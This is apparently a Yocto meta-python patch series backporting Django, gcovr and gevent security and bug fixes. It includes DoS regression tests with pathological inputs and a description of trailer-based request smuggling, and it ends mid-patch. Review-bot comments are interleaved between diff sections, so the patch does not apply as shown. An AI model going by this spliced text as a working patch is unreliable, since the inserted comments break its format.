+diff --git a/tests/utils_tests/test_encoding.py b/tests/utils_tests/test_encoding.py +index ea7ba5f..93a3162 100644 +--- a/tests/utils_tests/test_encoding.py ++++ b/tests/utils_tests/test_encoding.py +@@ -1,8 +1,9 @@ + import datetime ++import inspect + import sys + import unittest + from unittest import mock +-from urllib.parse import quote_plus ++from urllib.parse import quote, quote_plus + + from django.test import SimpleTestCase + from django.utils.encoding import ( +@@ -100,6 +101,24 @@ class TestEncodingUtils(SimpleTestCase): + except RecursionError: + self.fail('Unexpected RecursionError raised.') + ++ def test_repercent_broken_unicode_small_fragments(self): ++ data = b"test\xfctest\xfctest\xfc" ++ decoded_paths = [] ++ ++ def mock_quote(*args, **kwargs): ++ # The second frame is the call to repercent_broken_unicode(). ++ decoded_paths.append(inspect.currentframe().f_back.f_locals["path"]) ++ return quote(*args, **kwargs) ++ ++ with mock.patch("django.utils.encoding.quote", mock_quote): ++ self.assertEqual(repercent_broken_unicode(data), b"test%FCtest%FCtest%FC") ++ ++ # decode() is called on smaller fragment of the path each time. ++ self.assertEqual( ++ decoded_paths, ++ [b"test\xfctest\xfctest\xfc", b"test\xfctest\xfc", b"test\xfc"], ++ ) ++ + + class TestRFC3987IEncodingUtils(unittest.TestCase): + +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-43665.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-43665.patch new file mode 100644 index 0000000000..dbfb9b68a8 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-43665.patch 
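Review bot: The new `changed_parts` accumulation in `repercent_broken_unicode` has no comment saying why the already-handled prefix is set aside, and the only comment left in the loop still describes the CVE-2019-14235 recursion. As the added test states, the point is that `decode()` runs on a smaller fragment each pass instead of rescanning the whole path. A line such as `# CVE-2023-41164: keep the processed prefix out of path so each decode() only scans the remaining tail` above `changed_parts.append(...)` would keep a later cleanup from folding it back into `path = path[:e.start] + ...`. The function starts outside the hunk.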
@@ -0,0 +1,199 @@ +From b269a0063e9b10a6c88c92b24d1b92c7421950de Mon Sep 17 00:00:00 2001 +From: Natalia <124304+nessita@users.noreply.github.com> +Date: Wed, 29 Nov 2023 12:20:01 +0000 +Subject: [PATCH 1/2] Fixed CVE-2023-43665 -- Mitigated potential DoS in + django.utils.text.Truncator when truncating HTML text. + +Thanks Wenchao Li of Alibaba Group for the report. + +CVE: CVE-2023-43665 + +Upstream-Status: Backport [https://github.com/django/django/commit/ccdade1a0262537868d7ca64374de3d957ca50c5] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/utils/text.py | 18 ++++++++++++++++- + docs/ref/templates/builtins.txt | 20 +++++++++++++++++++ + docs/releases/2.2.28.txt | 20 +++++++++++++++++++ + tests/utils_tests/test_text.py | 35 ++++++++++++++++++++++++--------- + 4 files changed, 83 insertions(+), 10 deletions(-) + +diff --git a/django/utils/text.py b/django/utils/text.py +index 1fae7b2..06a377b 100644 +--- a/django/utils/text.py ++++ b/django/utils/text.py +@@ -57,7 +57,14 @@ def wrap(text, width): + class Truncator(SimpleLazyObject): + """ + An object used to truncate text, either by characters or words. ++ ++ When truncating HTML text (either chars or words), input will be limited to ++ at most `MAX_LENGTH_HTML` characters. + """ ++ ++ # 5 million characters are approximately 4000 text pages or 3 web pages. 
++ MAX_LENGTH_HTML = 5_000_000 ++ + def __init__(self, text): + super().__init__(lambda: str(text)) + +@@ -154,6 +161,11 @@ class Truncator(SimpleLazyObject): + if words and length <= 0: + return '' + ++ size_limited = False ++ if len(text) > self.MAX_LENGTH_HTML: ++ text = text[: self.MAX_LENGTH_HTML] ++ size_limited = True ++ + html4_singlets = ( + 'br', 'col', 'link', 'base', 'img', + 'param', 'area', 'hr', 'input' +@@ -203,10 +215,14 @@ class Truncator(SimpleLazyObject): + # Add it to the start of the open tags list + open_tags.insert(0, tagname) + ++ truncate_text = self.add_truncation_text("", truncate) ++ + if current_len <= length: ++ if size_limited and truncate_text: ++ text += truncate_text + return text ++ + out = text[:end_text_pos] +- truncate_text = self.add_truncation_text('', truncate) + if truncate_text: + out += truncate_text + # Close any tags still open +diff --git a/docs/ref/templates/builtins.txt b/docs/ref/templates/builtins.txt +index c4b0fa3..4faab38 100644 +--- a/docs/ref/templates/builtins.txt ++++ b/docs/ref/templates/builtins.txt +@@ -2318,6 +2318,16 @@ If ``value`` is ``"<p>Joel is a slug</p>"``, the output will be + + Newlines in the HTML content will be preserved. + ++.. admonition:: Size of input string ++ ++ Processing large, potentially malformed HTML strings can be ++ resource-intensive and impact service performance. ``truncatechars_html`` ++ limits input to the first five million characters. ++ ++.. versionchanged:: 2.2.28 ++ ++ In older versions, strings over five million characters were processed. ++ + .. templatefilter:: truncatewords + + ``truncatewords`` +@@ -2356,6 +2366,16 @@ If ``value`` is ``"<p>Joel is a slug</p>"``, the output will be + + Newlines in the HTML content will be preserved. + ++.. admonition:: Size of input string ++ ++ Processing large, potentially malformed HTML strings can be ++ resource-intensive and impact service performance. 
``truncatewords_html`` ++ limits input to the first five million characters. ++ ++.. versionchanged:: 2.2.28 ++ ++ In older versions, strings over five million characters were processed. ++ + .. templatefilter:: unordered_list + + ``unordered_list`` +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 40eb230..6a38e9c 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -56,3 +56,23 @@ CVE-2023-41164: Potential denial of service vulnerability in ``django.utils.enco + ``django.utils.encoding.uri_to_iri()`` was subject to potential denial of + service attack via certain inputs with a very large number of Unicode + characters. ++ ++Backporting the CVE-2023-43665 fix on Django 2.2.28. ++ ++CVE-2023-43665: Denial-of-service possibility in ``django.utils.text.Truncator`` ++================================================================================ ++ ++Following the fix for :cve:`2019-14232`, the regular expressions used in the ++implementation of ``django.utils.text.Truncator``'s ``chars()`` and ``words()`` ++methods (with ``html=True``) were revised and improved. However, these regular ++expressions still exhibited linear backtracking complexity, so when given a ++very long, potentially malformed HTML input, the evaluation would still be ++slow, leading to a potential denial of service vulnerability. ++ ++The ``chars()`` and ``words()`` methods are used to implement the ++:tfilter:`truncatechars_html` and :tfilter:`truncatewords_html` template ++filters, which were thus also vulnerable. ++ ++The input processed by ``Truncator``, when operating in HTML mode, has been ++limited to the first five million characters in order to avoid potential ++performance and memory issues. 
+diff --git a/tests/utils_tests/test_text.py b/tests/utils_tests/test_text.py +index 27e440b..cb3063d 100644 +--- a/tests/utils_tests/test_text.py ++++ b/tests/utils_tests/test_text.py +@@ -1,5 +1,6 @@ + import json + import sys ++from unittest.mock import patch + + from django.core.exceptions import SuspiciousFileOperation + from django.test import SimpleTestCase +@@ -87,11 +88,17 @@ class TestUtilsText(SimpleTestCase): + # lazy strings are handled correctly + self.assertEqual(text.Truncator(lazystr('The quick brown fox')).chars(10), 'The quick…') + +- def test_truncate_chars_html(self): ++ @patch("django.utils.text.Truncator.MAX_LENGTH_HTML", 10_000) ++ def test_truncate_chars_html_size_limit(self): ++ max_len = text.Truncator.MAX_LENGTH_HTML ++ bigger_len = text.Truncator.MAX_LENGTH_HTML + 1 ++ valid_html = "<p>Joel is a slug</p>" # 14 chars + perf_test_values = [ +- (('</a' + '\t' * 50000) + '//>', None), +- ('&' * 50000, '&' * 9 + '…'), +- ('_X<<<<<<<<<<<>', None), ++ ("</a" + "\t" * (max_len - 6) + "//>", None), ++ ("</p" + "\t" * bigger_len + "//>", "</p" + "\t" * 6 + "…"), ++ ("&" * bigger_len, "&" * 9 + "…"), ++ ("_X<<<<<<<<<<<>", None), ++ (valid_html * bigger_len, "<p>Joel is a…</p>"), # 10 chars + ] + for value, expected in perf_test_values: + with self.subTest(value=value): +@@ -149,15 +156,25 @@ class TestUtilsText(SimpleTestCase): + truncator = text.Truncator('<p>I <3 python, what about you?</p>') + self.assertEqual('<p>I <3 python,…</p>', truncator.words(3, html=True)) + ++ @patch("django.utils.text.Truncator.MAX_LENGTH_HTML", 10_000) ++ def test_truncate_words_html_size_limit(self): ++ max_len = text.Truncator.MAX_LENGTH_HTML ++ bigger_len = text.Truncator.MAX_LENGTH_HTML + 1 ++ valid_html = "<p>Joel is a slug</p>" # 4 words + perf_test_values = [ +- ('</a' + '\t' * 50000) + '//>', +- '&' * 50000, +- '_X<<<<<<<<<<<>', ++ ("</a" + "\t" * (max_len - 6) + "//>", None), ++ ("</p" + "\t" * bigger_len + "//>", "</p" + "\t" * (max_len - 3) + "…"), ++ ("&" 
* max_len, None), # no change ++ ("&" * bigger_len, "&" * max_len + "…"), ++ ("_X<<<<<<<<<<<>", None), ++ (valid_html * bigger_len, valid_html * 12 + "<p>Joel is…</p>"), # 50 words + ] +- for value in perf_test_values: ++ for value, expected in perf_test_values: + with self.subTest(value=value): + truncator = text.Truncator(value) +- self.assertEqual(value, truncator.words(50, html=True)) ++ self.assertEqual( ++ expected if expected else value, truncator.words(50, html=True) ++ ) + + def test_wrap(self): + digits = '1234 67 9' +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-46695.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-46695.patch new file mode 100644 index 0000000000..b7dda41f8f --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-46695.patch 
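Review bot: In the `current_len <= length` branch of the `Truncator` HTML truncation method, size-limited input is returned as the raw `text[: self.MAX_LENGTH_HTML]` slice plus the truncation text, without the step under `# Close any tags still open` that the path below applies to `out`. The slice can end inside a tag, and the new `test_truncate_words_html_size_limit` expectation `"</p" + "\t" * (max_len - 3) + "…"` pins exactly that output. Templates that render the result as markup can therefore emit unbalanced HTML for oversized input. Either close the entries of `open_tags` in this branch too, or state the caveat in the class docstring, e.g. `Input cut at MAX_LENGTH_HTML may end inside a tag and is returned without closing open tags.` The method begins outside the hunk, so the state of `open_tags` at this point should be confirmed.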
@@ -0,0 +1,90 @@ +From 32bc7fa517be1d50239827520cc13f3112d3d748 Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Wed, 29 Nov 2023 12:49:41 +0000 +Subject: [PATCH 2/2] Fixed CVE-2023-46695 -- Fixed potential DoS in + UsernameField on Windows. + +Thanks MProgrammer (https://hackerone.com/mprogrammer) for the report. + +CVE: CVE-2023-46695 + +Upstream-Status: Backport [https://github.com/django/django/commit/f9a7fb8466a7ba4857eaf930099b5258f3eafb2b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/contrib/auth/forms.py | 10 +++++++++- + docs/releases/2.2.28.txt | 14 ++++++++++++++ + tests/auth_tests/test_forms.py | 8 +++++++- + 3 files changed, 30 insertions(+), 2 deletions(-) + +diff --git a/django/contrib/auth/forms.py b/django/contrib/auth/forms.py +index e6f73fe..26d3ca7 100644 +--- a/django/contrib/auth/forms.py ++++ b/django/contrib/auth/forms.py +@@ -68,7 +68,15 @@ class ReadOnlyPasswordHashField(forms.Field): + + class UsernameField(forms.CharField): + def to_python(self, value): +- return unicodedata.normalize('NFKC', super().to_python(value)) ++ value = super().to_python(value) ++ if self.max_length is not None and len(value) > self.max_length: ++ # Normalization can increase the string length (e.g. ++ # "ff" -> "ff", "½" -> "1⁄2") but cannot reduce it, so there is no ++ # point in normalizing invalid data. Moreover, Unicode ++ # normalization is very slow on Windows and can be a DoS attack ++ # vector. ++ return value ++ return unicodedata.normalize("NFKC", value) + + + class UserCreationForm(forms.ModelForm): +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 6a38e9c..c653cb6 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -76,3 +76,17 @@ filters, which were thus also vulnerable. 
+ The input processed by ``Truncator``, when operating in HTML mode, has been + limited to the first five million characters in order to avoid potential + performance and memory issues. ++ ++Backporting the CVE-2023-46695 fix on Django 2.2.28. ++ ++CVE-2023-46695: Potential denial of service vulnerability in ``UsernameField`` on Windows ++========================================================================================= ++ ++The :func:`NFKC normalization <python:unicodedata.normalize>` is slow on ++Windows. As a consequence, ``django.contrib.auth.forms.UsernameField`` was ++subject to a potential denial of service attack via certain inputs with a very ++large number of Unicode characters. ++ ++In order to avoid the vulnerability, invalid values longer than ++``UsernameField.max_length`` are no longer normalized, since they cannot pass ++validation anyway. +diff --git a/tests/auth_tests/test_forms.py b/tests/auth_tests/test_forms.py +index bed23af..e73d4b8 100644 +--- a/tests/auth_tests/test_forms.py ++++ b/tests/auth_tests/test_forms.py +@@ -6,7 +6,7 @@ from django import forms + from django.contrib.auth.forms import ( + AdminPasswordChangeForm, AuthenticationForm, PasswordChangeForm, + PasswordResetForm, ReadOnlyPasswordHashField, ReadOnlyPasswordHashWidget, +- SetPasswordForm, UserChangeForm, UserCreationForm, ++ SetPasswordForm, UserChangeForm, UserCreationForm, UsernameField, + ) + from django.contrib.auth.models import User + from django.contrib.auth.signals import user_login_failed +@@ -132,6 +132,12 @@ class UserCreationFormTest(TestDataMixin, TestCase): + self.assertNotEqual(user.username, ohm_username) + self.assertEqual(user.username, 'testΩ') # U+03A9 GREEK CAPITAL LETTER OMEGA + ++ def test_invalid_username_no_normalize(self): ++ field = UsernameField(max_length=254) ++ # Usernames are not normalized if they are too long. 
++ self.assertEqual(field.to_python("½" * 255), "½" * 255) ++ self.assertEqual(field.to_python("ff" * 254), "ff" * 254) ++ + def test_duplicate_normalized_unicode(self): + """ + To prevent almost identical usernames, visually identical but differing +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django_2.2.28.bb b/meta-python/recipes-devtools/python/python3-django_2.2.28.bb index 9ef988176e..8c955e6bd8 100644 --- a/meta-python/recipes-devtools/python/python3-django_2.2.28.bb +++ b/meta-python/recipes-devtools/python/python3-django_2.2.28.bb @@ -5,6 +5,13 @@ UPSTREAM_CHECK_REGEX = "/${PYPI_PACKAGE}/(?P<pver>(2\.2\.\d*)+)/" inherit setuptools3 +SRC_URI += "file://CVE-2023-31047.patch \ + file://CVE-2023-36053.patch \ + file://CVE-2023-41164.patch \ + file://CVE-2023-43665.patch \ + file://CVE-2023-46695.patch \ + " + SRC_URI[sha256sum] = "0200b657afbf1bc08003845ddda053c7641b9b24951e52acd51f6abda33a7413" RDEPENDS:${PN} += "\ diff --git a/meta-python/recipes-devtools/python/python3-django_3.2.12.bb b/meta-python/recipes-devtools/python/python3-django_3.2.23.bb index adbc498bdf..beecaa607c 100644 --- a/meta-python/recipes-devtools/python/python3-django_3.2.12.bb +++ b/meta-python/recipes-devtools/python/python3-django_3.2.23.bb @@ -1,7 +1,7 @@ require python-django.inc inherit setuptools3 -SRC_URI[sha256sum] = "9772e6935703e59e993960832d66a614cf0233a1c5123bc6224ecc6ad69e41e2" +SRC_URI[sha256sum] = "82968f3640e29ef4a773af2c28448f5f7a08d001c6ac05b32d02aeee6509508b" RDEPENDS:${PN} += "\ ${PYTHON_PN}-sqlparse \ @@ -9,5 +9,5 @@ RDEPENDS:${PN} += "\ # Set DEFAULT_PREFERENCE so that the LTS version of django is built by # default. To build the 3.x branch, -# PREFERRED_VERSION_python3-django = "3.2.2" can be added to local.conf +# PREFERRED_VERSION_python3-django = "3.2.23" can be added to local.conf DEFAULT_PREFERENCE = "-1" 
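Review bot: The length guard in `UsernameField.to_python` only applies when `self.max_length is not None`, so a `UsernameField` created without `max_length` still hands input of any size to `unicodedata.normalize`. Whether any form in the tree constructs the field that way is not visible here, but the comment block should say so, e.g. `# Fields without max_length get no protection from this check.` A case for `UsernameField()` with no limit next to `test_invalid_username_no_normalize` would document the intended behaviour.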
diff --git a/meta-python/recipes-devtools/python/python3-django_4.0.2.bb b/meta-python/recipes-devtools/python/python3-django_4.2.10.bb index 690b9809dc..a9f25ac2b3 100644 --- a/meta-python/recipes-devtools/python/python3-django_4.0.2.bb +++ b/meta-python/recipes-devtools/python/python3-django_4.2.10.bb @@ -1,7 +1,7 @@ require python-django.inc inherit setuptools3 -SRC_URI[sha256sum] = "110fb58fb12eca59e072ad59fc42d771cd642dd7a2f2416582aa9da7a8ef954a" +SRC_URI[sha256sum] = "b1260ed381b10a11753c73444408e19869f3241fc45c985cd55a30177c789d13" RDEPENDS:${PN} += "\ ${PYTHON_PN}-sqlparse \ @@ -9,5 +9,5 @@ RDEPENDS:${PN} += "\ # Set DEFAULT_PREFERENCE so that the LTS version of django is built by # default. To build the 4.x branch, -# PREFERRED_VERSION_python3-django = "4.0.2" can be added to local.conf +# PREFERRED_VERSION_python3-django = "4.2.7" can be added to local.conf DEFAULT_PREFERENCE = "-1" diff --git a/meta-python/recipes-devtools/python/python3-gcovr/0001-Fix-parsing-of-gcov-metadata-601.patch b/meta-python/recipes-devtools/python/python3-gcovr/0001-Fix-parsing-of-gcov-metadata-601.patch new file mode 100644 index 0000000000..5530a39857 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-gcovr/0001-Fix-parsing-of-gcov-metadata-601.patch 
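Review bot: The updated comment in the second hunk tells users to set `PREFERRED_VERSION_python3-django = "4.2.7"`, but the recipe is renamed to `python3-django_4.2.10.bb`, so the documented value matches no recipe in this change. Someone following the comment would likely not get the 4.2 branch selected and could stay on the default version without noticing. The line should read `# PREFERRED_VERSION_python3-django = "4.2.10" can be added to local.conf`, or use the `4.2.%` wildcard so it survives the next point release.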
@@ -0,0 +1,84 @@
+From c4f53f28c4c537b75b5912a44083c41262807504 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Michael=20F=C3=B6rderer?= <michael.foerderer@gmx.de>
+Date: Sun, 3 Apr 2022 22:58:33 +0200
+Subject: [PATCH] Fix parsing of gcov metadata (#601)
+
+gcc-11 has metadata line "-: 0:Source is newer than graph" which throws an error.
+
+Upstream-Status: Backport [https://github.com/gcovr/gcovr/commit/7b6947bd4b6fd28a477606313fff3c13fcea8d3d]
+
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
+---
+ gcovr/gcov.py | 5 ++++-
+ gcovr/gcov_parser.py | 24 ++++++++++++++++++++----
+ 2 files changed, 24 insertions(+), 5 deletions(-)
+
+diff --git a/gcovr/gcov.py b/gcovr/gcov.py
+index cc7a9af4..ff4cdb0b 100644
+--- a/gcovr/gcov.py
++++ b/gcovr/gcov.py
+@@ -98,8 +98,11 @@ def process_gcov_data(data_fname, covdata, source_fname, options, currdir=None):
+ # Find the source file
+ # TODO: instead of heuristics, use "working directory" if available
+ metadata = parse_metadata(lines)
++ source = metadata.get("Source")
++ if source is None:
++ raise RuntimeError("Unexpected value 'None' for metadata 'Source'.")
+ fname = guess_source_file_name(
+- metadata["Source"].strip(),
++ source,
+ data_fname,
+ source_fname,
+ root_dir=options.root_dir,
+diff --git a/gcovr/gcov_parser.py b/gcovr/gcov_parser.py
+index 391ecd78..523ea406 100644
+--- a/gcovr/gcov_parser.py
++++ b/gcovr/gcov_parser.py
+@@ -121,7 +121,7 @@ class _MetadataLine(NamedTuple):
+ """A gcov line with metadata: ``-: 0:KEY:VALUE``"""
+
+ key: str
+- value: str
++ value: Optional[str]
+
+
+ class _BlockLine(NamedTuple):
+@@ -214,7 +214,19 @@ def parse_metadata(lines: List[str]) -> Dict[str, str]:
+ ... -: 0:Foo:bar
+ ... -: 0:Key:123
+ ... '''.splitlines())
+- {'Foo': 'bar', 'Key': '123'}
++ Traceback (most recent call last):
++ ...
++ RuntimeError: Missing key 'Source' in metadata. GCOV data was >>
++ -: 0:Foo:bar
++ -: 0:Key:123<< End of GCOV data
++ >>> parse_metadata('-: 0:Source: file \n -: 0:Foo: bar \n -: 0:Key: 123 '.splitlines())
++ {'Source': 'file', 'Foo': 'bar', 'Key': '123'}
++ >>> parse_metadata('''
++ ... -: 0:Source:file
++ ... -: 0:Foo:bar
++ ... -: 0:Key
++ ... '''.splitlines())
++ {'Source': 'file', 'Foo': 'bar', 'Key': None}
+ """
+ collected = {}
+ for line in lines:
+@@ -721,8 +733,12 @@ def _parse_line(line: str) -> _Line:
+
+ # METADATA (key, value)
+ if count_str == "-" and lineno == "0":
+- key, value = source_code.split(":", 1)
+- return _MetadataLine(key, value)
++ if ":" in source_code:
++ key, value = source_code.split(":", 1)
++ return _MetadataLine(key, value.strip())
++ else:
++ # Add a syntethic metadata with no value
++ return _MetadataLine(source_code, None)
+
+ if count_str == "-":
+ count = 0
+--
+2.41.0
+
diff --git a/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb b/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb
index 995f3b779b..5dcd9496c5 100644
--- a/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb
+++ b/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb
@@ -4,7 +4,8 @@ SECTION = "devel/python"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=08208c66520e8d69d5367483186d94ed"
-SRC_URI = "git://github.com/gcovr/gcovr.git;branch=master;protocol=https"
+SRC_URI = "git://github.com/gcovr/gcovr.git;branch=main;protocol=https"
+SRC_URI += "file://0001-Fix-parsing-of-gcov-metadata-601.patch"
 SRCREV = "e71e883521b78122c49016eb4e510e6da06c6916"
 S = "${WORKDIR}/git"
@@ -12,6 +13,6 @@ S = "${WORKDIR}/git"
 inherit setuptools3
 PIP_INSTALL_PACKAGE = "gcovr"
-RDEPENDS:${PN} += "${PYTHON_PN}-jinja2 ${PYTHON_PN}-lxml ${PYTHON_PN}-setuptools ${PYTHON_PN}-pygments"
+RDEPENDS:${PN} += "${PYTHON_PN}-jinja2 ${PYTHON_PN}-lxml ${PYTHON_PN}-setuptools ${PYTHON_PN}-pygments ${PYTHON_PN}-multiprocessing"
 BBCLASSEXTEND = "native nativesdk"
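Review bot: In 0001-Fix-parsing-of-gcov-metadata-601.patch the return annotation of `parse_metadata` stays `Dict[str, str]`, although the doctest added in the `-214` hunk of gcovr/gcov_parser.py now documents `{'Source': 'file', 'Foo': 'bar', 'Key': None}` and `_MetadataLine.value` becomes `Optional[str]`; the signature should read `-> Dict[str, Optional[str]]:`. The same doctest expects `RuntimeError: Missing key 'Source' in metadata`, but no hunk in this patch adds that raise to `parse_metadata` (gcov.py raises a different message), so unless the pinned SRCREV already contains it the doctest would not match the code. The comment `# Add a syntethic metadata with no value` should say `synthetic`. The bodies of `parse_metadata` and `_parse_line` continue outside the hunks, so this is based on the visible lines only.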
diff --git a/meta-python/recipes-devtools/python/python3-gevent/CVE-2023-41419.patch b/meta-python/recipes-devtools/python/python3-gevent/CVE-2023-41419.patch
new file mode 100644
index 0000000000..c92ba876a8
--- /dev/null
+++ b/meta-python/recipes-devtools/python/python3-gevent/CVE-2023-41419.patch
@@ -0,0 +1,673 @@
+From f80ee15e27b67b6fdd101d5f91cf584d19b2b26e Mon Sep 17 00:00:00 2001
+From: Jason Madden <jamadden@gmail.com>
+Date: Fri, 6 Oct 2023 12:41:59 +0000
+Subject: [PATCH] gevent.pywsgi: Much improved handling of chunk trailers.
+ Validation is much stricter to the specification.
+
+Fixes #1989
+
+CVE: CVE-2023-41419
+
+Upstream-Status: Backport [https://github.com/gevent/gevent/commit/2f53c851eaf926767fbac62385615efd4886221c]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+ docs/changes/1989.bugfix | 26 ++++
+ src/gevent/pywsgi.py | 229 ++++++++++++++++++++++++-------
+ src/gevent/subprocess.py | 7 +-
+ src/gevent/testing/testcase.py | 2 +-
+ src/gevent/tests/test__pywsgi.py | 193 ++++++++++++++++++++++++--
+ 5 files changed, 390 insertions(+), 67 deletions(-)
+ create mode 100644 docs/changes/1989.bugfix
+
+diff --git a/docs/changes/1989.bugfix b/docs/changes/1989.bugfix
+new file mode 100644
+index 0000000..7ce4a93
+--- /dev/null
++++ b/docs/changes/1989.bugfix
+@@ -0,0 +1,26 @@
++Make ``gevent.pywsgi`` comply more closely with the HTTP specification
++for chunked transfer encoding. In particular, we are much stricter
++about trailers, and trailers that are invalid (too long or featuring
++disallowed characters) forcibly close the connection to the client
++*after* the results have been sent.
++
++Trailers otherwise continue to be ignored and are not available to the
++WSGI application.
++
++Previously, carefully crafted invalid trailers in chunked requests on
++keep-alive connections might appear as two requests to
++``gevent.pywsgi``. Because this was handled exactly as a normal
++keep-alive connection with two requests, the WSGI application should
++handle it normally. However, if you were counting on some upstream
++server to filter incoming requests based on paths or header fields,
++and the upstream server simply passed trailers through without
++validating them, then this embedded second request would bypass those
++checks. (If the upstream server validated that the trailers meet the
++HTTP specification, this could not occur, because characters that are
++required in an HTTP request, like a space, are not allowed in
++trailers.) CVE-2023-41419 was reserved for this.
++
++Our thanks to the original reporters, Keran Mu
++(mkr22@mails.tsinghua.edu.cn) and Jianjun Chen
++(jianjun@tsinghua.edu.cn), from Tsinghua University and Zhongguancun
++Laboratory.
+diff --git a/src/gevent/pywsgi.py b/src/gevent/pywsgi.py
+index 0ebe095..078398a 100644
+--- a/src/gevent/pywsgi.py
++++ b/src/gevent/pywsgi.py
+@@ -1,13 +1,28 @@
+ # Copyright (c) 2005-2009, eventlet contributors
+ # Copyright (c) 2009-2018, gevent contributors
+ """
+-A pure-Python, gevent-friendly WSGI server.
++A pure-Python, gevent-friendly WSGI server implementing HTTP/1.1.
+
+ The server is provided in :class:`WSGIServer`, but most of the actual
+ WSGI work is handled by :class:`WSGIHandler` --- a new instance is
+ created for each request. The server can be customized to use
+ different subclasses of :class:`WSGIHandler`.
+
++.. important::
++ This server is intended primarily for development and testing, and
++ secondarily for other "safe" scenarios where it will not be exposed to
++ potentially malicious input. The code has not been security audited,
++ and is not intended for direct exposure to the public Internet. For production
++ usage on the Internet, either choose a production-strength server such as
++ gunicorn, or put a reverse proxy between gevent and the Internet.
++.. versionchanged:: NEXT
++ Complies more closely with the HTTP specification for chunked transfer encoding.
++ In particular, we are much stricter about trailers, and trailers that
++ are invalid (too long or featuring disallowed characters) forcibly close
++ the connection to the client *after* the results have been sent.
++ Trailers otherwise continue to be ignored and are not available to the
++ WSGI application.
++
+ """
+ from __future__ import absolute_import
+
+@@ -22,10 +37,7 @@ import time
+ import traceback
+ from datetime import datetime
+
+-try:
+- from urllib import unquote
+-except ImportError:
+- from urllib.parse import unquote # python 2 pylint:disable=import-error,no-name-in-module
++from urllib.parse import unquote
+
+ from gevent import socket
+ import gevent
+@@ -53,29 +65,52 @@ __all__ = [
+
+ MAX_REQUEST_LINE = 8192
+ # Weekday and month names for HTTP date/time formatting; always English!
+-_WEEKDAYNAME = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
+-_MONTHNAME = [None, # Dummy so we can use 1-based month numbers
++_WEEKDAYNAME = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")
++_MONTHNAME = (None, # Dummy so we can use 1-based month numbers
+ "Jan", "Feb", "Mar", "Apr", "May", "Jun",
+- "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
++ "Jul", "Aug", "Sep", "Oct", "Nov", "Dec")
+
+ # The contents of the "HEX" grammar rule for HTTP, upper and lowercase A-F plus digits,
+ # in byte form for comparing to the network.
+ _HEX = string.hexdigits.encode('ascii')
+
++# The characters allowed in "token" rules.
++
++# token = 1*tchar
++# tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*"
++# / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~"
++# / DIGIT / ALPHA
++# ; any VCHAR, except delimiters
++# ALPHA = %x41-5A / %x61-7A ; A-Z / a-z
++_ALLOWED_TOKEN_CHARS = frozenset(
++ # Remember we have to be careful because bytestrings
++ # inexplicably iterate as integers, which are not equal to bytes.
++
++ # explicit chars then DIGIT
++ (c.encode('ascii') for c in "!#$%&'*+-.^_`|~0123456789")
++ # Then we add ALPHA
++) | {c.encode('ascii') for c in string.ascii_letters}
++assert b'A' in _ALLOWED_TOKEN_CHARS
++
++
+ # Errors
+ _ERRORS = {}
+ _INTERNAL_ERROR_STATUS = '500 Internal Server Error'
+ _INTERNAL_ERROR_BODY = b'Internal Server Error'
+-_INTERNAL_ERROR_HEADERS = [('Content-Type', 'text/plain'),
+- ('Connection', 'close'),
+- ('Content-Length', str(len(_INTERNAL_ERROR_BODY)))]
++_INTERNAL_ERROR_HEADERS = (
++ ('Content-Type', 'text/plain'),
++ ('Connection', 'close'),
++ ('Content-Length', str(len(_INTERNAL_ERROR_BODY)))
++)
+ _ERRORS[500] = (_INTERNAL_ERROR_STATUS, _INTERNAL_ERROR_HEADERS, _INTERNAL_ERROR_BODY)
+
+ _BAD_REQUEST_STATUS = '400 Bad Request'
+ _BAD_REQUEST_BODY = ''
+-_BAD_REQUEST_HEADERS = [('Content-Type', 'text/plain'),
+- ('Connection', 'close'),
+- ('Content-Length', str(len(_BAD_REQUEST_BODY)))]
++_BAD_REQUEST_HEADERS = (
++ ('Content-Type', 'text/plain'),
++ ('Connection', 'close'),
++ ('Content-Length', str(len(_BAD_REQUEST_BODY)))
++)
+ _ERRORS[400] = (_BAD_REQUEST_STATUS, _BAD_REQUEST_HEADERS, _BAD_REQUEST_BODY)
+
+ _REQUEST_TOO_LONG_RESPONSE = b"HTTP/1.1 414 Request URI Too Long\r\nConnection: close\r\nContent-length: 0\r\n\r\n"
+@@ -204,23 +239,32 @@ class Input(object):
+ # Read and return the next integer chunk length. If no
+ # chunk length can be read, raises _InvalidClientInput.
+
+- # Here's the production for a chunk:
+- # (http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html)
+- # chunk = chunk-size [ chunk-extension ] CRLF
+- # chunk-data CRLF
+- # chunk-size = 1*HEX
+- # chunk-extension= *( ";" chunk-ext-name [ "=" chunk-ext-val ] )
+- # chunk-ext-name = token
+- # chunk-ext-val = token | quoted-string
+-
+- # To cope with malicious or broken clients that fail to send valid
+- # chunk lines, the strategy is to read character by character until we either reach
